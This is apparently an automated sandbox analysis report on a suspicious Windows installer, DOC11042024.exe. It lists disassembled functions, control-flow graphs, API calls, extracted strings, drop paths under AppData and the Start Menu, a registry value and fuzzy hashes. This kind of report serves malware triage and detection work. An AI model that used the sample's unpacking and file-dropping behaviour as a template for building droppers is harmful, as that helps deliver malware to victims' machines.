                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F2A
                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F3D
                                                                              • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403F66
                                                                              • SetWindowTextW.USER32(?,004226D0), ref: 00403F7A
                                                                              • ShowWindow.USER32(?,0000000A), ref: 004040AE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                              • String ID:
                                                                              • API String ID: 3282139019-0
                                                                              • Opcode ID: 3fd5af53ea26621af15d7c5044a3014bafe85ffefd1f887050c8ed1a3cb03858
                                                                              • Instruction ID: 7980c8cf747b8cef6b1672c5771399f4a2adcbcf5af25c6cade82d8abc4c4844
                                                                              • Opcode Fuzzy Hash: 3fd5af53ea26621af15d7c5044a3014bafe85ffefd1f887050c8ed1a3cb03858
                                                                              • Instruction Fuzzy Hash: C5C1AF71A04204FBDB206F61ED45E2B3AA8FB89745F40053EF641B11F1CB799852DB2E
                                                                              Function 00402D52 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 203memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 342 402d52-402da0 GetTickCount GetModuleFileNameW call 405b2b 345 402da2-402da7 342->345 346 402dac-402dda call 405ea2 call 405956 call 405ea2 GetFileSize 342->346 347 402ff1-402ff5 345->347 354 402de0-402df7 346->354 355 402eca-402ed8 call 402cb0 346->355 356 402df9 354->356 357 402dfb-402e01 call 40329f 354->357 362 402fa9-402fae 355->362 363 402ede-402ee1 355->363 356->357 361 402e06-402e08 357->361 364 402f65-402f6d call 402cb0 361->364 365 402e0e-402e14 361->365 362->347 366 402ee3-402ef4 call 4032d1 call 40329f 363->366 367 402f0d-402f59 GlobalAlloc call 406328 call 405b5a CreateFileW 363->367 364->362 369 402e94-402e98 365->369 370 402e16-402e2e call 405ae6 365->370 385 402ef9-402efb 366->385 393 402f5b-402f60 367->393 394 402f6f-402f9f call 4032d1 call 402ff8 367->394 374 402ea1-402ea7 369->374 375 402e9a-402ea0 call 402cb0 369->375 370->374 388 402e30-402e37 370->388 381 402ea9-402eb7 call 4062ba 374->381 382 402eba-402ec4 374->382 375->374 381->382 382->354 382->355 385->362 390 402f01-402f07 385->390 388->374 392 402e39-402e40 388->392 390->362 390->367 392->374 395 402e42-402e49 392->395 393->347 401 402fa4-402fa7 394->401 395->374 398 402e4b-402e52 395->398 398->374 400 402e54-402e74 398->400 400->362 402 402e7a-402e7e 400->402 401->362 403 402fb0-402fc1 401->403 404 402e80-402e84 402->404 405 402e86-402e8e 402->405 407 402fc3 403->407 408 402fc9-402fce 403->408 404->355 404->405 405->374 406 402e90-402e92 405->406 406->374 407->408 409 402fcf-402fd5 408->409 409->409 410 402fd7-402fef call 405ae6 409->410 410->347
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 00402D66
                                                                              • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402D82
                                                                                • Part of subcall function 00405B2B: GetFileAttributesW.KERNELBASE(00000003,00402D95,00437800,80000000,00000003), ref: 00405B2F
                                                                                • Part of subcall function 00405B2B: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B51
                                                                              • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00402DCB
                                                                              • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F12
                                                                              Strings
                                                                              • Null, xrefs: 00402E4B
                                                                              • soft, xrefs: 00402E42
                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402F5B
                                                                              • C:\Users\user\Desktop, xrefs: 00402DAD, 00402DB2, 00402DB8
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00402D5F, 00402F2A
                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FA9
                                                                              • Inst, xrefs: 00402E39
                                                                              • Error launching installer, xrefs: 00402DA2
                                                                              • "C:\Users\user\Desktop\DOC11042024.exe", xrefs: 00402D5B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                              • String ID: "C:\Users\user\Desktop\DOC11042024.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                              • API String ID: 2803837635-3253787394
                                                                              • Opcode ID: 97da4d5e289e1c6823f6d21d208570733ed839a1e69cbdd9da071d2ccff4fb3f
                                                                              • Instruction ID: 39e96f3da37de392ad1d16f7a7c40a881931d9dfdf17fa4d6eacf34a14b492bc
                                                                              • Opcode Fuzzy Hash: 97da4d5e289e1c6823f6d21d208570733ed839a1e69cbdd9da071d2ccff4fb3f
                                                                              • Instruction Fuzzy Hash: B461F471940206ABDB209F65DE89BAE37B8EB14358F20417BF904B72D1C7BC9D419B9C
                                                                              Function 00401752 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 475 401752-401777 call 402ad0 call 405981 480 401781-401793 call 405ea2 call 40590a lstrcatW 475->480 481 401779-40177f call 405ea2 475->481 486 401798-401799 call 406136 480->486 481->486 490 40179e-4017a2 486->490 491 4017a4-4017ae call 4061e5 490->491 492 4017d5-4017d8 490->492 499 4017c0-4017d2 491->499 500 4017b0-4017be CompareFileTime 491->500 494 4017e0-4017fc call 405b2b 492->494 495 4017da-4017db call 405b06 492->495 502 401870-401899 call 405156 call 402ff8 494->502 503 4017fe-401801 494->503 495->494 499->492 500->499 517 4018a1-4018ad SetFileTime 502->517 518 40189b-40189f 502->518 504 401852-40185c call 405156 503->504 505 401803-401841 call 405ea2 * 2 call 405ec4 call 405ea2 call 405685 503->505 515 401865-40186b 504->515 505->490 538 401847-401848 505->538 519 402966 515->519 521 4018b3-4018be CloseHandle 517->521 518->517 518->521 523 402968-40296c 519->523 524 4018c4-4018c7 521->524 525 40295d-402960 521->525 527 4018c9-4018da call 405ec4 lstrcatW 524->527 528 4018dc-4018df call 405ec4 524->528 525->519 532 4018e4-402241 call 405685 527->532 528->532 532->523 532->525 538->515 540 40184a-40184b 538->540 540->504
                                                                              APIs
                                                                              • lstrcatW.KERNEL32(00000000,00000000,%TMP%,C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213,?,?,00000031), ref: 00401793
                                                                              • CompareFileTime.KERNEL32(-00000014,?,%TMP%,%TMP%,00000000,00000000,%TMP%,C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213,?,?,00000031), ref: 004017B8
                                                                                • Part of subcall function 00405EA2: lstrcpynW.KERNEL32(?,?,00000400,0040338A,004281E0,NSIS Error), ref: 00405EAF
                                                                                • Part of subcall function 00405156: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D2A,00000000,?), ref: 0040518E
                                                                                • Part of subcall function 00405156: lstrlenW.KERNEL32(00402D2A,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D2A,00000000), ref: 0040519E
                                                                                • Part of subcall function 00405156: lstrcatW.KERNEL32(Completed,00402D2A,00402D2A,Completed,00000000,00000000,00000000), ref: 004051B1
                                                                                • Part of subcall function 00405156: SetWindowTextW.USER32(Completed,Completed), ref: 004051C3
                                                                                • Part of subcall function 00405156: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004051E9
                                                                                • Part of subcall function 00405156: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405203
                                                                                • Part of subcall function 00405156: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405211
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                              • String ID: %TMP%$C:\ProgramData\Microsoft\Windows\Start Menu\ciliella.Kon$C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213$anagallis\salpetersyrlingens\Derrieres
                                                                              • API String ID: 1941528284-4107701048
                                                                              • Opcode ID: 26ce854ad2a687dd4b68b877923e8a366a5206fcc7c9fcc1248f97bd833514a2
                                                                              • Instruction ID: 22a91fb72557606927d70f2de95ff677577d9c63a8d7304a52a497fb5f012bc3
                                                                              • Opcode Fuzzy Hash: 26ce854ad2a687dd4b68b877923e8a366a5206fcc7c9fcc1248f97bd833514a2
                                                                              • Instruction Fuzzy Hash: B341A171900514BACF10BBB5CD869AF7A79EF05369F20423BF411B11E1D63C9A419AAE
                                                                              Function 00405156 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 541 405156-40516b 542 405171-405182 541->542 543 405222-405226 541->543 544 405184-405188 call 405ec4 542->544 545 40518d-405199 lstrlenW 542->545 544->545 546 4051b6-4051ba 545->546 547 40519b-4051ab lstrlenW 545->547 550 4051c9-4051cd 546->550 551 4051bc-4051c3 SetWindowTextW 546->551 547->543 549 4051ad-4051b1 lstrcatW 547->549 549->546 552 405213-405215 550->552 553 4051cf-405211 SendMessageW * 3 550->553 551->550 552->543 554 405217-40521a 552->554 553->552 554->543
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D2A,00000000,?), ref: 0040518E
                                                                              • lstrlenW.KERNEL32(00402D2A,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D2A,00000000), ref: 0040519E
                                                                              • lstrcatW.KERNEL32(Completed,00402D2A,00402D2A,Completed,00000000,00000000,00000000), ref: 004051B1
                                                                              • SetWindowTextW.USER32(Completed,Completed), ref: 004051C3
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004051E9
                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405203
                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405211
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                              • String ID: Completed
                                                                              • API String ID: 2531174081-3087654605
                                                                              • Opcode ID: c7982dcc7f83d9d1842baaa3c0c2181428a9a97c7e691b8a5e5e7162ba0b32dc
                                                                              • Instruction ID: d692a32c2c93acf61f21c05d2d51278f0d0ef08fe7b7c33e5886d0bb106249d0
                                                                              • Opcode Fuzzy Hash: c7982dcc7f83d9d1842baaa3c0c2181428a9a97c7e691b8a5e5e7162ba0b32dc
                                                                              • Instruction Fuzzy Hash: 8F219D75D00618BADB219F95ED44ADFBFB8EF54350F10807AF944B62A0C3798A41CFA8
                                                                              Function 00402FF8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 555 402ff8-403007 556 403025-403030 call 403123 555->556 557 403009-40301f SetFilePointer 555->557 560 403036-403050 ReadFile 556->560 561 40311c-403120 556->561 557->556 562 403056-403059 560->562 563 403119 560->563 562->563 565 40305f-403072 call 403123 562->565 564 40311b 563->564 564->561 565->561 568 403078-40307b 565->568 569 4030e8-4030ee 568->569 570 40307d-403080 568->570 573 4030f0 569->573 574 4030f3-403106 ReadFile 569->574 571 403114-403117 570->571 572 403086 570->572 571->561 575 40308b-403093 572->575 573->574 574->563 576 403108-403111 574->576 577 403095 575->577 578 403098-4030aa ReadFile 575->578 576->571 577->578 578->563 579 4030ac-4030af 578->579 579->563 580 4030b1-4030c6 WriteFile 579->580 581 4030e4-4030e6 580->581 582 4030c8-4030cb 580->582 581->564 582->581 583 4030cd-4030e0 582->583 583->575 584 4030e2 583->584 584->571
                                                                              APIs
                                                                              • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00000000,?,?,?,00402FA4,000000FF,00000000,00000000,00409230,?), ref: 0040301F
                                                                              • ReadFile.KERNELBASE(00409230,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402FA4,000000FF,00000000,00000000,00409230), ref: 0040304C
                                                                              • ReadFile.KERNELBASE(00413E78,00004000,?,00000000,00409230,?,00402FA4,000000FF,00000000,00000000,00409230,?), ref: 004030A6
                                                                              • WriteFile.KERNELBASE(00000000,00413E78,?,000000FF,00000000,?,00402FA4,000000FF,00000000,00000000,00409230,?), ref: 004030BE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: File$Read$PointerWrite
                                                                              • String ID: x>A
                                                                              • API String ID: 2113905535-3854404225
                                                                              • Opcode ID: d62910b3130867b8d2b2b4b66368bca281eb4fe54e9a8637888efbc56b62b4fa
                                                                              • Instruction ID: 8d48c07fc761829a1fe9f1a1938812e098a54f4c61c40dafa2fa98847bc1c045
                                                                              • Opcode Fuzzy Hash: d62910b3130867b8d2b2b4b66368bca281eb4fe54e9a8637888efbc56b62b4fa
                                                                              • Instruction Fuzzy Hash: F4311631500209FBDF21CF56DC45ADE7FBCEB89365B20803AF514AA1A1D3349E51DBA9
                                                                              Function 00403123 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 585 403123-40314c GetTickCount 586 403152-40317d call 4032d1 SetFilePointer 585->586 587 40328d-403295 call 402cb0 585->587 592 403182-403194 586->592 593 403297-40329c 587->593 594 403196 592->594 595 403198-4031a6 call 40329f 592->595 594->595 598 4031ac-4031b8 595->598 599 40327f-403282 595->599 600 4031be-4031c4 598->600 599->593 601 4031c6-4031cc 600->601 602 4031ef-40320b call 406348 600->602 601->602 603 4031ce-4031ee call 402cb0 601->603 608 403288 602->608 609 40320d-403215 602->609 603->602 610 40328a-40328b 608->610 611 403217-40322d WriteFile 609->611 612 403249-40324f 609->612 610->593 613 403284-403286 611->613 614 40322f-403233 611->614 612->608 615 403251-403253 612->615 613->610 614->613 616 403235-403241 614->616 615->608 617 403255-403268 615->617 616->600 618 403247 616->618 617->592 619 40326e-40327d SetFilePointer 617->619 618->617 619->587
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 00403138
                                                                                • Part of subcall function 004032D1: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F7D,?), ref: 004032DF
                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,0040302E,00000004,00000000,00000000,00000000,?,?,?,00402FA4,000000FF,00000000), ref: 0040316B
                                                                              • WriteFile.KERNELBASE(0040BE78,004115C3,00000000,00000000,00413E78,00004000,?,00000000,?,0040302E,00000004,00000000,00000000,00000000,?,?), ref: 00403225
                                                                              • SetFilePointer.KERNELBASE(000EB5FA,00000000,00000000,00413E78,00004000,?,00000000,?,0040302E,00000004,00000000,00000000,00000000,?,?), ref: 00403277
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: File$Pointer$CountTickWrite
                                                                              • String ID: x>A
                                                                              • API String ID: 2146148272-3854404225
                                                                              • Opcode ID: fa2ac6caa82680caf266c7245f95f6909007e954e5544f6c93c355d0f4c1dc10
                                                                              • Instruction ID: be67401aa815a72444c4fca473ff593188792000a8d1d40a5fc3cceba1093085
                                                                              • Opcode Fuzzy Hash: fa2ac6caa82680caf266c7245f95f6909007e954e5544f6c93c355d0f4c1dc10
                                                                              • Instruction Fuzzy Hash: 3041CE325042019BDB10AF29ED848AA7BACFB55316720827FE910B22F0D7799D41DBDD
                                                                              Function 0040232F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 620 40232f-402375 call 402bc5 call 402ad0 * 2 RegCreateKeyExW 627 40237b-402383 620->627 628 40295d-40296c 620->628 629 402385-402392 call 402ad0 lstrlenW 627->629 630 402396-402399 627->630 629->630 633 4023a9-4023ac 630->633 634 40239b-4023a8 call 402ab3 630->634 638 4023bd-4023d1 RegSetValueExW 633->638 639 4023ae-4023b8 call 402ff8 633->639 634->633 642 4023d3 638->642 643 4023d6-4024b0 RegCloseKey 638->643 639->638 642->643 643->628 645 402729-402730 643->645 645->628
                                                                              APIs
                                                                              • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
                                                                              • lstrlenW.KERNEL32(anagallis\salpetersyrlingens\Derrieres,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
                                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,anagallis\salpetersyrlingens\Derrieres,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
                                                                              • RegCloseKey.ADVAPI32(?,?,?,anagallis\salpetersyrlingens\Derrieres,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateValuelstrlen
                                                                              • String ID: anagallis\salpetersyrlingens\Derrieres
                                                                              • API String ID: 1356686001-2143557105
                                                                              • Opcode ID: dfe757ae4a63ab883042433471831b04dad67b44d44d30b17957abb00fdbcd93
                                                                              • Instruction ID: 234511cbfb2b8cfa258c76439d50fcb03ec8edfd55ed9f08cc7278d5cba6d51a
                                                                              • Opcode Fuzzy Hash: dfe757ae4a63ab883042433471831b04dad67b44d44d30b17957abb00fdbcd93
                                                                              • Instruction Fuzzy Hash: 1B118171A00109BFEB10AFA0DD49EAF777CEB00358F10043AF505B61D0D7B85D419B69
                                                                              Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 646 4015b9-4015cd call 402ad0 call 4059b5 651 401614-401617 646->651 652 4015cf-4015eb call 405937 CreateDirectoryW 646->652 654 401646-402195 call 401423 651->654 655 401619-401638 call 401423 call 405ea2 SetCurrentDirectoryW 651->655 660 40160a-401612 652->660 661 4015ed-4015f8 GetLastError 652->661 668 402729-402730 654->668 669 40295d-40296c 654->669 655->669 670 40163e-401641 655->670 660->651 660->652 664 401607 661->664 665 4015fa-401605 GetFileAttributesW 661->665 664->660 665->660 665->664 668->669 670->669
                                                                              APIs
                                                                                • Part of subcall function 004059B5: CharNextW.USER32(?,?,00424ED8,?,00405A29,00424ED8,00424ED8,?,?,75922EE0,00405751,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\DOC11042024.exe"), ref: 004059C3
                                                                                • Part of subcall function 004059B5: CharNextW.USER32(00000000), ref: 004059C8
                                                                                • Part of subcall function 004059B5: CharNextW.USER32(00000000), ref: 004059E0
